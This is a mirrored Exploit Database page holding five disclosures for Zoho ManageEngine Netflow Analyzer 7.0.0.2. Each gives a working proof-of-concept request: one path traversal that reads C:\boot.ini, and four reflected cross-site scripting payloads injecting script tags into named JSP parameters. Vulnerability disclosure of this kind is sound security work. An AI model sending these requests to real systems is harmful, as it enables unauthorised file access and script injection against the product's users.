Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 – Path Traversal / Cross-Site Scripting

• Exploit Database
• 118 阅读

• 作者： Rafael Pedrero
  日期： 2019-02-19
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/46425/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155

  <!-- # Exploit Title: Path traversal vulnerability in Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 17-02-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-8925 # Category: webapps 1. Description An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. An Absolute Path Traversal vulnerability in the Administration zone, in /netflow/servlet/CReportPDFServlet (via the parameter schFilePath), allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via any file name, such as a schFilePath=C:\boot.ini value. 2. Proof of Concept   Original request: http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\boot.ini   3. Solution: The product is discontinued. Update to last version this product.   -->     <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-8926 # Category: webapps 1. Description An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/popup1.jsp file via these GET parameters: bussAlert, customDev, and selSource.   2. Proof of Concept http://localhost:8080/netflow/jspui/popup1.jsp?selSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true   Parameters: bussAlert, customDev and selSource     3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules     -->     <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-8927 # Category: webapps 1. Description An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/scheduleConfig.jsp file via these GET parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10, and val11.   2. Proof of Concept http://localhost:8080/netflow/jspui/scheduleConfig.jsp?rowIncrement=true&match_flag=true&removeRows=&rep_Type=cust&schSource=interface&rep_schedule=daily&performTask=&disp=&stHr=09&edHr=17&filterFlag=false&selectDeviceDone=&devSrc=auxz6%22%3e%3cscript%3ealert(1)%3c%2fscript%3etqq9idmqry5&popup=false&task=add&f=&mset=&getFilter=false&resetter=true&excWeekModify=&mailReport=true&stH=09&edH=17&boxChecked0=&selCh0=&threshRow=1&schName=www&schDesc=qqq&sourcesel=40&repType=cust&logicOp=AND&sel0=SrcAddr&val10=&rowCount=1&repSchedule=Daily&dailysel1=02&dailysel2=00&dailysel3=1&dmsg=&weeklysel1=1&weeklysel2=02&weeklysel3=00&weeklysel4=3&monthsel1=1&monthsel2=02&monthsel3=00&monthlysel4=5&repGenTime=2019-02-18+14%3A55&oncesel4=1&omsg=&mailreport=mailreport&emailId=   Parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10 and val11     3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules     -->     <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-8928 # Category: webapps 1. Description An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in /netflow/jspui/userManagementForm.jsp via these GET parameters: authMeth, passWord, pwd1, and userName.   2. Proof of Concept http://localhost:8080/netflow/jspui/userManagementForm.jsp?moveLR=&moveRL=&moveLRIP=&moveRLIP=&moveLRBuss=&moveRLBuss=&addField=&authMeth=fgcuh%3e%3cscript%3ealert(1)%3c%2fscript%3eyxcpve1able&createRadUser=false&radSet=&userName=qqq&radiusUser=Authenticate+locally&pwd1=qqqqqq&passWord=qqqqqq&priv=Guest   Parameters: authMeth, passWord, pwd1 and userName     3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules     -->     <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-8929 # Category: webapps 1. Description An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/selectDevice.jsp file in these GET parameters: param and rtype. 2. Proof of Concept http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=collopts&param=g3oxp%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C!--q5uad   Parameters: param and rtype     3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules     -->